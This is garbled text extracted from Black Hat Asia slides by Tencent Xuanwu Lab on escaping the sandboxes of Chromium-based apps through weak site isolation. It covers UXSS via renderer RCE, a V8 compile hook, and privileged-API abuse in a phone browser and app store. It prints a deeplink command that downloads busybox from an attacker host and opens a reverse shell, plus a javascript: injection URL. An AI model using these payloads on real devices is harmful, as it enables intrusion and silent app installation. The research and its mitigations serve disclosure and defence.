1、#BHASIA BlackHatEventsThe Hole in Sandbox:The Hole in Sandbox:EscapeEscape Modern WebModern Web-Based App Sandbox From Based App Sandbox From SiteSite-Isolation PerspectiveIsolation PerspectiveBohan Liu,Haibin ShiTencent Security Xuanwu Lab#BHASIA BlackHatEventsWho are weWho are weP4nda20371774Secur

2、ity Researcher at Tencent Security Xuanwu LabMainly Engaged in Browser SecurityGoogle Chrome Bug HunterBohan LiuHaibin ShiAryb1nSecurity Researcher at Tencent Security Xuanwu LabAndroid Security#BHASIA BlackHatEventsIntroductionIntroduction#BHASIA BlackHatEventsMultiMulti-process Architecture in Chr

3、omeprocess Architecture in Chromehttps:/ EngineMemory AllocatorRendering EngineDOMCSSMediaWeb APIs#BHASIA BlackHatEventsSandbox Sandbox in Chromein ChromeJavaScript EngineMemory AllocatorRendering EngineDOMCSSMediaWeb APIsSandboxIPCIPC ClientIPC ServerDo not re-invent the wheel Windows:A restricted

4、token&The Windows job object&The Windows desktop object&Integrity levels Linux:Seccomp-BPF&User namespaces Android:SELinuxPrinciple of least privilege Mandatory access controlled environment Isolated Process when HTML rendering and JavaScriptexecution Limited resource access Limited IPC/kernel inter

5、action access#BHASIA BlackHatEventshttps:/ capabilities of renderer RCEThe capabilities of renderer RCEJavaScript EngineMemory AllocatorRendering EngineDOMCSSMediaWeb APIsSandboxIPCIPC ClientIPC ServerWhat can attacker do with SHELLCODE:1.Invoke limitedsystem calls and Access limitedresources.2.Send

6、 evil IPC with ANYarguments.3.Patch ALLcode in render process.mprotect/etc/hosts#BHASIA BlackHatEventsAny other next-steps after renderer rceexcept Sandbox escape?GPU or network processes RCE Universal Cross Site Scriptinghttps:/ capabilities of renderer RCEThe capabilities of renderer RCERenderer R

7、CESandbox EscapeUniversal XSS#BHASIA BlackHatEventsFrom Renderer RCE to From Renderer RCE to UXSSUXSS#BHASIA BlackHatEventsWhat is UXSS?What is UXSS?XSS vs UXSS:XSS in UXSS in BWeb ServerEvil parameteralert(xss);Injected on Web SWeb SUXSS EXPalert(xss);Injected when #BHASIA BlackHatEventsThe History

8、 of UXSSThe History of UXSSUXSS is a long-standing problem that plagues various browsers.#BHASIA BlackHatEventsHow To UXSSHow To UXSSWhat stops us from injecting code from other domains?DEMO!-window.addEventListener(load,function()var iframe=document.getElementById(myFrame);var script=document.creat

9、eElement(script);script.textContent=alert(UXSS);var iframeObject=iframe.contentWindow;console.log(iframeObject.document.body.appendChild(script););Access blocked due to SOP#BHASIA BlackHatEventsHow To UXSSHow To UXSSSame-origin policy(SOP)restrict web pages from making requests to a different domain

10、 than the one that served the original web page.Protocol(Scheme):The protocol(HTTP or HTTPS)of the two origins must be the same.Domain:The domain of the two origins must be the same.Port:If a port is specified in the URL,it must be the same for both origins.Access blocked due to SOPHow to bypass SOP

11、?#BHASIA BlackHatEventsCase Study:SOP Bypass via Renderer RCE in SafariCase Study:SOP Bypass via Renderer RCE in SafariForget the Sandbox Escape:Abusing Browsers from Code Execution -Amy Burnett-BlueHatIL2020 Condition 1:The attackers Page and the victim iframe in the same renderer.Condition 2:The C

12、heck Code in the renderer process.Condition 3:Domain structure used by Check Code also in the process.=Modify data in Renderer Process to bypass check.1.Overwrite m_universalAccessin SecurityOrigin of the domain -bypass Check of Cross-domain data access -Inject XSS payload into iframe2.Overwrite pro

13、tocol,host,port in SecurityOrigin of the domain-bypass X-Frame-Options-Make any site can be loaded in iframehttps:/ DOMWindow:isInsecureScriptAccess(DOMWindow&activeWindow,const String&urlString)/.if(activeWindow.document()-securityOrigin().canAccess(document()-securityOrigin()return false;/.printEr

14、rorMessage(crossDomainAccessErrorMessage(.);bool FrameLoader:shouldInterruptLoadForXFrameOptions(.)/.XFrameOptionsDisposition disposition=parseXFrameOptionsHeader(content);switch(disposition)case XFrameOptionsSameOrigin:/Check if the parent is the same originif(!origin-isSameSchemeHostPort(topFrame.

15、document()-securityOrigin()return true;return false;case XFrameOptionsDeny:/Always interrupt loadreturn true;/.Parent Page:https:/IframePage:https:/#BHASIA BlackHatEventsCase Study:SOP Bypass via Renderer RCE in SafariCase Study:SOP Bypass via Renderer RCE in SafariForget the Sandbox Escape:Abusing

16、Browsers from Code Execution -Amy Burnett-BlueHatIL2020 Condition 1:The attackers Page and the victim iframeare in the same renderer.Condition 2:The Check Code(such as SOP)is in the renderer process.Condition 3:Domain structure used by Check Code is also in the process.=Modify data in Renderer Proce

17、ss to bypass check.1.Overwrite m_universalAccessin SecurityOrigin of the domain -bypass Check of Cross-domain data access -Inject XSS payload into iframe2.Overwrite protocol,host,port in SecurityOrigin of the domain-bypass X-Frame-Options-Make any site can be loaded in iframehttps:/ DOMWindow:isInse

18、cureScriptAccess(DOMWindow&activeWindow,const String&urlString)/.if(activeWindow.document()-securityOrigin().canAccess(document()-securityOrigin()return false;/.printErrorMessage(crossDomainAccessErrorMessage(.);bool FrameLoader:shouldInterruptLoadForXFrameOptions(.)/.XFrameOptionsDisposition dispos

19、ition=parseXFrameOptionsHeader(content);switch(disposition)case XFrameOptionsSameOrigin:/Check if the parent is the same originif(!origin-isSameSchemeHostPort(topFrame.document()-securityOrigin()return true;return false;case XFrameOptionsDeny:/Always interrupt loadreturn true;/.#BHASIA BlackHatEvent

20、sUXSS Harden in ChromeUXSS Harden in ChromeForget the Sandbox Escape:Abusing Browsers from Code Execution -Amy Burnett-BlueHatIL2020 Condition 1:The attackers Page and the victim iframeare in the same renderer.Condition 2:The Check Code(such as SOP)is in the renderer process.Condition 3:Domain struc

21、ture used by Check Code is also in the process.=Modify data in Renderer Process to bypass check.https:/research.google/pubs/analysis-of-uxss-exploits-and-mitigations-in-chromium/2017.02Out-of-Process iframes(OOPIFs)Allow a child frame of a page to be rendered by a different process than its parent f

22、rame Kill Condition 1PlzNavigate Move cross-origin security checks to Browser Process.Kill Condition 2&32017.10Site IsolationLimits each renderer process to documents from a single site.The most promising countermeasure against UXSS attacks.2018.07#BHASIA BlackHatEventsWhat is Site Isolation?What is

23、 Site Isolation?principle:Treats each web site as a separate security principal requiring a dedicated renderer process.Whats new:Site Principals Dedicated Processes Cross-Process Navigations Out-of-process iframes Cross-Origin Read Blockinghttps:/www.usenix.org/system/files/sec19-reis.pdfhttp:/ifram

24、ehttp:/Tab/Window ASame ProcessProcess-Per-Tab Modelhttp:/Process Ahttp:/Process BSite Isolation Model1.2.window.open(“http:/”)location.href=“http:/”http:/Tab/Window ASame ProcessProcess-Per-Tab Modelhttp:/http:/Process Ahttp:/Process BSite Isolation ModelCross-Process NavigationsOut-of-process ifra

25、mes#BHASIA BlackHatEventsHow is Site Isolation implemented?How is Site Isolation implemented?How to trace code?NavigationRequest:StartNavigationvoid NavigationRequest:StartNavigation()/.if(associated_rfh_type_!=AssociatedRenderFrameHostType:NONE)RenderFrameHostImpl*navigating_frame_host=associated_r

26、fh_type_=AssociatedRenderFrameHostType:SPECULATIVE?frame_tree_node_-render_manager()-speculative_frame_host():frame_tree_node_-current_frame_host();SetExpectedProcess(navigating_frame_host-GetProcess();/.#BHASIA BlackHatEventsHow is Site Isolation implemented?How is Site Isolation implemented?How to

27、 trace code?NavigationRequest:StartNavigationvoid NavigationRequest:StartNavigation()/.if(associated_rfh_type_!=AssociatedRenderFrameHostType:NONE)RenderFrameHostImpl*navigating_frame_host=associated_rfh_type_=AssociatedRenderFrameHostType:SPECULATIVE?frame_tree_node_-render_manager()-speculative_fr

28、ame_host():frame_tree_node_-current_frame_host();SetExpectedProcess(navigating_frame_host-GetProcess();/.RenderFrameHostManager:GetFrameHostForNavigation(NavigationRequest*request,BrowsingContextGroupSwap*browsing_context_group_swap,std:string*reason)SiteInstanceImpl*current_site_instance=render_fra

29、me_host_-GetSiteInstance();bool is_same_site=render_frame_host_-IsNavigationSameSite(request-GetUrlInfo();IsSameSiteGetter is_same_site_getter(is_same_site);scoped_refptr dest_site_instance=GetSiteInstanceForNavigationRequest(request,is_same_site_getter,browsing_context_group_swap,reason);/A subfram

30、e should always be in the same BrowsingInstance as the parent/(see also https:/ SiteInstance determines whether to switch RenderFrameHost or not.bool use_current_rfh=current_site_instance=dest_site_instance;/./.if(use_current_rfh)request-SetAssociatedRFHType(NavigationRequest:AssociatedRenderFrameHo

31、stType:CURRENT);/.else/.navigation_rfh=speculative_render_frame_host_.get();request-SetAssociatedRFHType(NavigationRequest:AssociatedRenderFrameHostType:SPECULATIVE);/./.#BHASIA BlackHatEventsHow is Site Isolation implemented?How is Site Isolation implemented?How to trace code?NavigationRequest:Star

32、tNavigationvoid NavigationRequest:StartNavigation()/.if(associated_rfh_type_!=AssociatedRenderFrameHostType:NONE)RenderFrameHostImpl*navigating_frame_host=associated_rfh_type_=AssociatedRenderFrameHostType:SPECULATIVE?frame_tree_node_-render_manager()-speculative_frame_host():frame_tree_node_-curren

33、t_frame_host();SetExpectedProcess(navigating_frame_host-GetProcess();/.RenderFrameHostManager:GetFrameHostForNavigation(NavigationRequest*request,BrowsingContextGroupSwap*browsing_context_group_swap,std:string*reason)SiteInstanceImpl*current_site_instance=render_frame_host_-GetSiteInstance();bool is

34、_same_site=render_frame_host_-IsNavigationSameSite(request-GetUrlInfo();IsSameSiteGetter is_same_site_getter(is_same_site);scoped_refptr dest_site_instance=GetSiteInstanceForNavigationRequest(request,is_same_site_getter,browsing_context_group_swap,reason);/A subframe should always be in the same Bro

35、wsingInstance as the parent/(see also https:/ SiteInstance determines whether to switch RenderFrameHost or not.bool use_current_rfh=current_site_instance=dest_site_instance;/./.if(use_current_rfh)request-SetAssociatedRFHType(NavigationRequest:AssociatedRenderFrameHostType:CURRENT);/.else/.navigation

36、_rfh=speculative_render_frame_host_.get();request-SetAssociatedRFHType(NavigationRequest:AssociatedRenderFrameHostType:SPECULATIVE);/./.scoped_refptr BrowsingInstance:GetSiteInstanceForURLHelper(const UrlInfo&url_info,bool allow_default_instance)const SiteInfo site_info=ComputeSiteInfoForURL(url_inf

37、o);auto i=site_instance_map_.find(site_info);if(i!=site_instance_map_.end()return i-second;/Check to see if we can use the default SiteInstance for sites that dont/need to be isolated in their own process.if(allow_default_instance&SiteInstanceImpl:CanBePlacedInDefaultSiteInstance(isolation_context_,

38、url_info.url,site_info)scoped_refptr site_instance=default_site_instance_.get();if(!site_instance)site_instance=new SiteInstanceImpl(this);/Note:|default_site_instance_|will get set inside this call/via RegisterSiteInstance().site_instance-SetSiteInfoToDefault(site_info.storage_partition_config();DC

39、HECK_EQ(default_site_instance_,site_instance.get();/Add|site_info|to the set so we can keep track of all the sites the/the default SiteInstance has been returned for.site_instance-AddSiteInfoToDefault(site_info);return site_instance;return nullptr;#BHASIA BlackHatEventsHow is Site Isolation implemen

40、ted?How is Site Isolation implemented?When to reuse SiteInstance?bool SiteInfo:RequiresDedicatedProcess(const IsolationContext&isolation_context)const DCHECK_CURRENTLY_ON(BrowserThread:UI);DCHECK(isolation_context.browser_or_resource_context();/If-site-per-process is enabled,site isolation is enable

41、d everywhere.if(SiteIsolationPolicy:UseDedicatedProcessesForAllSites()return true;/.return false;/staticbool SiteIsolationPolicy:UseDedicatedProcessesForAllSites()if(base:CommandLine:ForCurrentProcess()-HasSwitch(switches:kSitePerProcess)return true;if(IsSiteIsolationDisabled(SiteIsolationMode:kStri

42、ctSiteIsolation)return false;/The switches above needs to be checked first,because if the/ContentBrowserClient consults a base:Feature,then it will activate the/field trial and assigns the client either to a control or an experiment/group-such assignment should be final.return GetContentClient()&Get

43、ContentClient()-browser()-ShouldEnableStrictSiteIsolation();#BHASIA BlackHatEventsHow is Site Isolation implemented?How is Site Isolation implemented?When to reuse SiteInstance?bool SiteInfo:RequiresDedicatedProcess(const IsolationContext&isolation_context)const DCHECK_CURRENTLY_ON(BrowserThread:UI)

44、;DCHECK(isolation_context.browser_or_resource_context();/If-site-per-process is enabled,site isolation is enabled everywhere.if(SiteIsolationPolicy:UseDedicatedProcessesForAllSites()return true;/.return false;/staticbool SiteIsolationPolicy:UseDedicatedProcessesForAllSites()if(base:CommandLine:ForCu

45、rrentProcess()-HasSwitch(switches:kSitePerProcess)return true;if(IsSiteIsolationDisabled(SiteIsolationMode:kStrictSiteIsolation)return false;/The switches above needs to be checked first,because if the/ContentBrowserClient consults a base:Feature,then it will activate the/field trial and assigns the

46、 client either to a control or an experiment/group-such assignment should be final.return GetContentClient()&GetContentClient()-browser()-ShouldEnableStrictSiteIsolation();bool ContentBrowserClient:ShouldEnableStrictSiteIsolation()#if BUILDFLAG(IS_ANDROID)return false;#elsereturn true;#endif#BHASIA

47、BlackHatEventsHow is Site Isolation implemented?How is Site Isolation implemented?When to reuse SiteInstance?bool SiteInfo:RequiresDedicatedProcess(const IsolationContext&isolation_context)const DCHECK_CURRENTLY_ON(BrowserThread:UI);DCHECK(isolation_context.browser_or_resource_context();/If-site-per

48、-process is enabled,site isolation is enabled everywhere.if(SiteIsolationPolicy:UseDedicatedProcessesForAllSites()return true;/.return false;/staticbool SiteIsolationPolicy:UseDedicatedProcessesForAllSites()if(base:CommandLine:ForCurrentProcess()-HasSwitch(switches:kSitePerProcess)return true;if(IsS

49、iteIsolationDisabled(SiteIsolationMode:kStrictSiteIsolation)return false;/The switches above needs to be checked first,because if the/ContentBrowserClient consults a base:Feature,then it will activate the/field trial and assigns the client either to a control or an experiment/group-such assignment s

50、hould be final.return GetContentClient()&GetContentClient()-browser()-ShouldEnableStrictSiteIsolation();bool ContentBrowserClient:ShouldEnableStrictSiteIsolation()#if BUILDFLAG(IS_ANDROID)return false;#elsereturn true;#endifWe can reuse the same process after navigation in Android!#BHASIA BlackHatEv

51、entsFrom Renderer RCE to UXSS in AndroidFrom Renderer RCE to UXSS in AndroidThe way to inject JavaScript into another pageWhat we have:The ability to patch all the code segment or modify data based on the Renderer RCE The victim page could be in the same process we controlWhen to inject:DOM Tree Bui

52、lding JavaScript Compilation JavaScript Code Execution#BHASIA BlackHatEventsHook the code of JavaScript CompilationMaybeLocal ScriptCompiler:Compile(Local context,Source*source,CompileOptions options,NoCacheReason no_cache_reason)Utils:ApiCheck(!source-GetResourceOptions().IsModule(),v8:ScriptCompil

53、er:Compile,v8:ScriptCompiler:CompileModule must be used to compile modules);auto i_isolate=context-GetIsolate();MaybeLocal maybe=CompileUnboundInternal(i_isolate,source,options,no_cache_reason);Local result;if(!maybe.ToLocal(&result)return MaybeLocal();v8:Context:Scope scope(context);return result-B

54、indToCurrentContext();v8:MaybeLocal CompileScriptInternal(v8:Isolate*isolate,ScriptState*script_state,const ClassicScript&classic_script,v8:ScriptOrigin origin,v8:ScriptCompiler:CompileOptions compile_options,v8:ScriptCompiler:NoCacheReason no_cache_reason,std:optional*cache_result)v8:Local code=V8S

55、tring(isolate,classic_script.SourceText();/TODO(kouhei):Plumb the ScriptState into this function and replace all/Isolate-GetCurrentContext in this function with ScriptState-GetContext.if(ScriptStreamer*streamer=classic_script.Streamer()if(v8:ScriptCompiler:StreamedSource*source=streamer-Source(v8:Sc

56、riptType:kClassic)/Final compile call for a streamed compilation./Streaming compilation may involve use of code cache./TODO(leszeks):Add compile timer to streaming compilation.return v8:ScriptCompiler:Compile(script_state-GetContext(),source,code,origin);/.HookFrom Renderer RCE to UXSS in AndroidFro

57、m Renderer RCE to UXSS in Android#BHASIA BlackHatEventsHook the code of JavaScript CompilationMaybeLocal ScriptCompiler:Compile(Local context,Source*source,CompileOptions options,NoCacheReason no_cache_reason)Utils:ApiCheck(!source-GetResourceOptions().IsModule(),v8:ScriptCompiler:Compile,v8:ScriptC

58、ompiler:CompileModule must be used to compile modules);auto i_isolate=context-GetIsolate();MaybeLocal maybe=CompileUnboundInternal(i_isolate,source,options,no_cache_reason);Local result;if(!maybe.ToLocal(&result)return MaybeLocal();v8:Context:Scope scope(context);return result-BindToCurrentContext()

59、;v8:MaybeLocal CompileScriptInternal(v8:Isolate*isolate,ScriptState*script_state,const ClassicScript&classic_script,v8:ScriptOrigin origin,v8:ScriptCompiler:CompileOptions compile_options,v8:ScriptCompiler:NoCacheReason no_cache_reason,std:optional*cache_result)v8:Local code=V8String(isolate,classic

60、_script.SourceText();/TODO(kouhei):Plumb the ScriptState into this function and replace all/Isolate-GetCurrentContext in this function with ScriptState-GetContext.if(ScriptStreamer*streamer=classic_script.Streamer()if(v8:ScriptCompiler:StreamedSource*source=streamer-Source(v8:ScriptType:kClassic)/Fi

61、nal compile call for a streamed compilation./Streaming compilation may involve use of code cache./TODO(leszeks):Add compile timer to streaming compilation.return v8:ScriptCompiler:Compile(script_state-GetContext(),source,code,origin);/.Evil_V8String(isolate,classic_script.SourceText();inline v8:Loca

62、l Evil_V8String(v8:Isolate*isolate,const ParkableString&string)if(some_special_condition)return V8String(isolate,alert(pwned);elsereturn V8String(isolate,string);From Renderer RCE to UXSS in AndroidFrom Renderer RCE to UXSS in Android#BHASIA BlackHatEventsHook the code of JavaScript Compilation1Vict

63、ims openattackers sitePatch the code ViaRenderer RCE1.Find the base address of chrome.so2.Call mprotect to set the code segment as rwx.3.Call mmap to allocate a code space to deploy the Evil_V8String.4.Patch the code in CompileScriptInternal.23Navigate to the victim site1.Clear Context.2.Reset locat

64、ion.href4Trigger UXSS when loading1.Choose a good time to inject JavaScript code Using some_special_condition.2.Enjoy your UXSS!From Renderer RCE to UXSS in AndroidFrom Renderer RCE to UXSS in Android#BHASIA BlackHatEventsDemo:Chrome For Android 90.0.4430.61Issues 40070451:Security:Site Isolation fo

65、r Android doesnt isolate all sites(https:/issues.chromium.org/issues/40070451)From Renderer RCE to UXSS in AndroidFrom Renderer RCE to UXSS in AndroidRenderer RCESandbox EscapeUniversal XSS#BHASIA BlackHatEventsHowever theres not much we can do here until we can get site isolation fully up on Androi

66、d.Use heuristics to isolate the sites that need it most.From Renderer RCE to UXSS in AndroidFrom Renderer RCE to UXSS in AndroidWe Cant inject JavaScript into after Chrome 92.#BHASIA BlackHatEventsWhat are the sites that need isolation most?sites where users log in by entering a password sites with

67、the industry-standard OAuth protocol sites with Cross-Origin-Opener-Policy(COOP)response headerSite isolation mainly protects private data related to user login,just as it was originally launched for side-channel attacks like Specter.From Renderer RCE to UXSS in AndroidFrom Renderer RCE to UXSS in A

68、ndroidhttps:/ other unprotected but equally dangerous sites are there?#BHASIA BlackHatEventsWhat are the sites that need isolation most?sites where users log in by entering a password sites with the industry-standard OAuth protocol sites with Cross-Origin-Opener-Policy(COOP)response headerSite isola

69、tion mainly protects private data related to user login,just as it was originally launched for side-channel attacks like Specter.From Renderer RCE to UXSS in AndroidFrom Renderer RCE to UXSS in Androidhttps:/ other unprotected but equally dangerous sites are there?From the perspective of Android Chr

70、ome developers,just protecting these sites is enough,but There is a category of apps called Web-based App,implemented by Browser components using Chromium.Usually Web-based App has more complex functions.Could these apps have survived using similar protection?#BHASIA BlackHatEventsExamining Examinin

71、g WebWeb-based App based App Design Design From Site Isolation From Site Isolation PerspectivePerspective#BHASIA BlackHatEventsWhy web-based App?Multi-platform design can be completely consistent Easily update content Low development costs Some other benefitsIn short,we have found that many software

72、 includes components for displaying web content.The Design of WebThe Design of Web-based App based App#BHASIA BlackHatEventsBut sometimes just showing is not enough We may want to check if the user has installed a certain app and its version We may want to check if the users other software is in log

73、in mode And some other native capabilities beyond web capabilities Until the emergence of JavaScript Interface,it was possible to invoke user native capabilities from the web side.The Design of WebThe Design of Web-based App based App#BHASIA BlackHatEventsSome JavaScript interfaces actually implemen

74、t quite powerful functions:Open native application Execute commands on user devices Installing applications on user devices etc.we called them privileged APIs.If we can also call these APIs in our web pages,it is possible to achieve sandbox escape effects!But developers also came up with this,thus l

75、imiting the use of these privileged APIs to only websites they trust:The Design of WebThe Design of Web-based App based App If(checkUrlIfTrusted(url)privilegedAPI();else alert(“Ooooops”);It seems that this kind of inspection is very comprehensive.#BHASIA BlackHatEventsIs it possible to break the sec

76、urity assumption of trusted domain checks+privileged APIs?The prerequisite for security is that“the domain name that can be checked is trustworthy and not malicious”If we assume that the manufacturer protects the domain name they trust well,is this considered secure?In a perfect site isolation(i.e.F

77、ull site isolation),there is indeed no way to do so without breaking through the sandbox.In reality,is the site isolation in Web based apps really as perfect as developers imagine?The Design of WebThe Design of Web-based App based App#BHASIA BlackHatEventsRenderer RCESandbox EscapeUniversal XSSBut i

78、f real-world software has perfect site isolation?Due to compromises in performance and other aspects,many web-based applications are deficient in the implementation of site isolation.In apps that do not implement Full site isolation,we may use the UXSS solution to call any privileged API to achieve

79、the effect of sandbox escape.Lets show the design and attack methods in different types of apps in turn.The Design of WebThe Design of Web-based App based App#BHASIA BlackHatEventsEscape Modern WebEscape Modern Web-Based App Sandbox From SiteBased App Sandbox From Site-Isolation PerspectiveIsolation

80、 Perspective#BHASIA BlackHatEventsThe AppsThe Apps wewe carecare Web-based APP on PC-e.g.PC Application based CEF Mobile Browser -e.g.The default browser for mobile phone Android App based WebView -e.g.The App Store for mobile phoneThe default browser for many major brands of mobile phones#BHASIA Bl

81、ackHatEventsType 1:PC Application based CEF Type 1:PC Application based CEF#BHASIA BlackHatEventsHow to develop a Web-based APP on PC?WebWeb-based APP on PCbased APP on PCBrowser Component（Webview、libcef、electron）Resource（privileged domain）html、JavaScriptTrusted sitesLocal ResourceClient function（cl

82、ient logic）JAVA/C+/nodejsPrivileged APIPrivileged domain resolutionLocal storage（offline functions,accelerate）Cache fileDatabaseRemote storage（Real storage）Other（Non-browser display interface）Register Privileged APIExport JS objectRegister privileged domainsProcess parsingClient Behavior（upload/down

83、load/open）Domain check RenderTrigger client behaviorParse and locate local resourcesProvide data for displaystore data TemporarilyAsynchronous data transferExtra features1.Privileged API code mainly implements the common functions of the client2.Many implicit deeplinksare registered in Privileged do

84、main resolution#BHASIA BlackHatEventsThe weakness in Web-based APP on PC?What Can be optimized in Web-based APP?(Optimizing chrome itself is difficult,it is better to optimize the process of loading pages)1.When the APP opening:A renderer process is created in the background.2.When clicking a URL:Di

85、splay the window of renderer process and navigate to the URL.3.When closing the Website:Hide the window and navigate to about:blank.WebWeb-based APP on PCbased APP on PC1.Stability2.Running speed3.Good user experience:Save the overhead of startup and destruction!:Kill the site isolation,we can get U

86、XSS in privileged domain!#BHASIA BlackHatEventsFind More bugs in privileged APIPrivileged_API.cryptoAPI.decrypt(key,input,output,cb)Unverified input file source:UNC?Path traversal when writing files:././X.exe?Write any value to any filePrivileged_API.StartX.start()CreateProcess(“”,“X.exe”,Null,);Sta

87、rt an executable fileWebWeb-based APP on PCbased APP on PCBOOL decrypt(const wchar_t*inputFilePath,const wchar_t*outputFilePath,const char*key,Function*cb)HANDLE hInputFile=CreateFile(inputFilePath,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);std:ofstream outputFile(outputFilePath,s

88、td:ios:binary);DWORD fileSize=GetFileSize(hInputFile,NULL);BYTE*inputData=new BYTEfileSize;DWORD bytesRead;if(!ReadFile(hInputFile,inputData,fileSize,&bytesRead,NULL)cb();return FALSE;CloseHandle(hInputFile);DecryptImpl(inputData);outputFile.write(reinterpret_cast(inputData),bytesRead);outputFile.cl

89、ose();cb();return TRUE;Remote Code Execution#BHASIA BlackHatEventsD Demo for Webemo for Web-based APP on PCbased APP on PCRemote Code ExecutionVisible on site#BHASIA BlackHatEventsType 2:The default browser for phonesType 2:The default browser for phones#BHASIA BlackHatEventsThe Design of Mobile Bro

90、wserThe Design of Mobile BrowserWhy Vendors default Mobile Browser?One of the few applications that can interact RCE is possible with just one click Pre-installed on your phone,no need to download Interactive points for mobile projects on pwn2ownThis is an attractive target for security researchers!

91、#BHASIA BlackHatEventsThe Design of Mobile BrowserThe Design of Mobile BrowserVendors default Mobile Browser vs Android Chrome The manufacturers default browser is a secondary development based on Android Pre-installed on your phone,no need to download Interactive points for mobile projects on pwn2o

92、wnThe site isolation mechanism implemented by the vendors default browser is similar to Android Chrome,both are Partial Site-Isolation.So we can use the UXSS method mentioned earlier to inject JS into the records of the privileged domain to further control the privileged domain.#BHASIA BlackHatEvent

93、sThe Design of Mobile BrowserThe Design of Mobile BrowserA Case:The default browser of mobile phone A After testing,we found that there are some advertising functions in the browser,which enables silent installation of the App.After analysis,we found that such advertising functions can only be calle

94、d from specific websites,which are privileged domains designated for mobile phone manufacturers.#BHASIA BlackHatEventsThe Design of Mobile BrowserThe Design of Mobile BrowserUseful privilege API：browser.openApp(app_name_string)-Apps can be opened based on the app_name_string browser.installApp(app_n

95、ame_string,callback)-Apps can be installed based on the parameter app_name_string-We can use the parameter callback to call openApp after installation.#BHASIA BlackHatEventsThe Design of Mobile BrowserThe Design of Mobile BrowserThis is not good enough:we found that only apps in the app store can be

96、 installed.-We need to upload a self-developed app with a backdoor to the app store,just like most of the pwn2own players in recent years.However,this method takes more time and carries the risk of being discovered by the auditors,but we have to rush to participate in TFC.Are there other ways to exp

97、loit it?#BHASIA BlackHatEventsThe Design of Mobile BrowserThe Design of Mobile BrowserA possible solution：We can control the device through existing apps in some app stores.The App needs to be able to interact with us to achieve the effect of executing an arbitrary command.After analysis,we identifi

98、ed the following applications:Terminal application or scripting language interpreter#BHASIA BlackHatEventsThe Design of Mobile BrowserThe Design of Mobile BrowserWhy terminal application?We found that there is such an App that can execute the parameters passed in by deeplink as commands.like this,te

99、rminal:/xlabxlab?cmd=$whoamiSo,we can reverse shell by download and run busybox as nc.terminal:/xlabxlabt?cmd=curl o data/data/terminal.app/busybox http:/$ip:$port/busybox;chmod 755 data/data/terminal.app/busybox;/data/data/terminal.app/busybox nc$ip$port e bin/sh#BHASIA BlackHatEventsThe Design of

100、Mobile BrowserThe Design of Mobile BrowserAnd more flexible privileged API we need:browser.startActivityWithDeeplink(deeplink_string)-Software can be launched based on deeplink_data-Compared with openApp,this method can pass arguments when starting the App.#BHASIA BlackHatEventsDemoDemo#BHASIA Black

101、HatEventsType 3:WebView based Android App with extremely Type 3:WebView based Android App with extremely high permissionshigh permissions#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewWhy Android App based WebView?Most of these can probably be lau

102、nched from browser(CATEGORY_BROWSABLE)Android App based WebView vs Mobile Browser The browser can load the content of any website But,Web-based App can generally display some manufacturer-related content.When the App receives some untrustworthy content,it may even jump to the browser to open it.#BHA

103、SIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewA Case:The default app store of mobile phone A The target app is the manufacturers built-in app store application,similar to the Google Play application Apps can be installed and opened silently from the

104、target app The target app can probably be launched from browserIn summary,the target application is a great target for pwn2own and TFC#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewActivity 1：start point of attack Exported,BROWSABLE,Registered for

105、 rich deeplinks handle Intent and Distributed to different web-based activitiesvoid handleIntent()Intent intent=getIntent();Uri data=intent.getData();String targetPage=UriUtils.getTargetPage(data);if(TextUtils.equals(targetPage,PAGE_LITE_WEB)launchTargetActivity(LiteWebActivity.class);return;/#BHASI

106、A BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewActivity 1 divides links into three types to process separately:untrusted website-Jump to browser to open-，,Manufacturer-related sites-Open in Activity with WebView with no Privileged API-,WebSites related

107、to app store business-Open in Activity of WebView with Privileged API-,#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewActivity 2:Activity of WebView with Privileged API have privileged APIs we want to use No way to load untrusted domains Javascrip

108、tInterfacepublic boolean usefulJSInterface1()/JavascriptInterfacepublic boolean usefulJSInterface2()/#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewUseful privilege API in Activity 2：market.install(app_name_string)-Apps can be opened based on the

109、app_name_string market.install(app_name_string,callback)-Apps can be installed based on the app_name_string-We can use the parameter callback to call openApp after installation.#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewButwe didnt find a way

110、to load our own website in Activity 2.We have to find a way to load our Exp first!After some research,we found a target:Activity 3.Activity with WebView with no Privileged API But,a vulnerability that can inject arbitrary page contentmarket:/web?url=JavaScript:document.write(evilcode)#BHASIA BlackHa

111、tEventsThe Design of Android App based WebViewThe Design of Android App based WebViewWhat we have now?Activity 1-Receive the Intent sent by the browser,and start Activity1 or Activity2 Activity 2-privileged API to open and install apps Activity 3-Load arbitrary website via vulnerability Is it possib

112、le to attack WebView in Activity2 through WebView in Activity3?#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewEmmm，After our testing:WebViewsbetween different Apps have complete site-isolation.But,there is only one WebView Renderer process in the

113、same App.-That means-Yes,there is no site-isolation between different Webviews in an App.#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewSo,we completed the attack s：Browser:Send Intent to launch Activity1 in app store-Activity 1:Distribute Intent

114、to launch Activity2-Activity 2:Inject evil JS code Web Content in Activity 2:Send Intent to launch Activity1 in app store-Activity 1:Distribute Intent to launch Activity3-Activity 3:invoke Privileged API to Install and open App Sandbox Escape#BHASIA BlackHatEventsDemoDemo#BHASIA BlackHatEventsFor th

115、e implementation of site isolation Make heuristic site isolation configurable to protect privileged domain Perform same-origin judgment first and then decide whether to reuse the processSuggestionsSuggestionsFor Web based App developers Restrict privileges on JavaScript Interface API to prevent exce

116、ssive privileges Use immutable code whenever possible to implement high-risk operations#BHASIA BlackHatEventsAcknowledgementAcknowledgement Yang Yu(tombkeeper)Wei Liu YongkeWang(Rudykewang)HuimingLiu(liuhm09)Zheng Wang(xmzyshypnc1)GuanchengLi(Atuml1)#BHASIA BlackHatEventsThanksThanksBohan Liu(P4nda20371774)Haibin Shi(aryb1n)